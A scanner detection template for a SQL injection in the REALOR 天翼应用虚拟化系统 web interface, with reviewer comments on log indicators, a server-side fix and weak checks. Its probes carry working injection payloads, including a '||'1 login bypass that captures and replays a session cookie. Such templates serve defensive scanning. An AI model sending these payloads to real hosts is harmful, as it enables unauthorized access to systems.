漏洞描述
FOFA: app="REALOR-天翼应用虚拟化系统"
# Detection template for a SQL injection in the web interface of the product
# fingerprinted below (REALOR 天翼应用虚拟化系统). `info` is metadata, `rules`
# holds three HTTP probes (r0-r2), and the final top-level `expression`
# decides the verdict from their results.
#
# Defender view: the two request paths below, together with quote characters
# in the `initParams` / `user` query parameters, are the strings to search for
# in web-server access logs. The root cause is fixed server-side, by binding
# those parameters instead of concatenating them into the query.
id: realor-gwt-system-sql-injection
info:
  name: Realor GWT System SQL injection
  author: xpoc
  severity: high
  verified: true
  # Free-text field; here it carries only the FOFA fingerprint string for the
  # product. No affected version or advisory id is given anywhere in this file.
  description: |
    FOFA: app="REALOR-天翼应用虚拟化系统"
  tags: realor,sqli
  created: 2023/06/23
rules:
  # r0: one GET with no cookie or auth header set by this rule. The `user`
  # field inside `initParams` contains a URL-encoded single quote (%27).
  r0:
    request:
      method: GET
      # NOTE(review): `sign` is a fixed value; presumably it is bound to these
      # exact parameters, so editing `initParams` may invalidate it - confirm.
      path: /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6
    # Passes when the body contains the message "未查询到符合条件的用户"
    # (roughly: "no user matching the conditions was found").
    # NOTE(review): this looks like the ordinary lookup-miss message. Confirm
    # that a fixed build answers this input differently; otherwise r0 can flag
    # patched hosts, and r0 alone is enough to satisfy the final expression.
    expression: response.body.bcontains(b"未查询到符合条件的用户")
  # r1: GET to the login command (cmd=UserLogin) with quote characters in the
  # `user` parameter and no password parameter.
  r1:
    request:
      method: GET
      path: /AgentBoard.XGI?user='||'1&cmd=UserLogin
    # Passes when the body contains "CustomInfo" and the set-cookie header
    # mentions PHPSESSID, i.e. the server issued a session cookie.
    # NOTE(review): the lower-case "set-cookie" key assumes the engine
    # normalises header names - confirm.
    expression: response.body.bcontains(b"CustomInfo") && response.headers["set-cookie"].contains("PHPSESSID")
    output:
      # Extracts the session id from the raw response headers. The pattern
      # requires a ';' after the value, so a cookie with no attributes after
      # it would not be captured.
      search: '"PHPSESSID=(?P<PHPSESSID>.*?);".bsubmatch(response.raw_header)'
      # Exposes the capture as the variable consumed by r2 as {{PHPSESSID}}.
      PHPSESSID: search["PHPSESSID"]
  # r2: replays the session id captured in r1 against /Board.XGI.
  r2:
    request:
      method: GET
      path: /Board.XGI
      headers:
        Cookie: PHPSESSID={{PHPSESSID}}
    # Passes when the body contains `src="custom/`.
    # NOTE(review): presumably this marker is rendered only for an
    # authenticated session; verify it is absent from the logged-out page.
    expression: response.body.bcontains(b"src=\"custom/")
# Final verdict. Assuming the usual precedence (&& binds tighter than ||),
# this reads r0() || (r1() && r2()): r0 alone is sufficient, or r1 and r2
# must both pass.
expression: r0() || r1() && r2()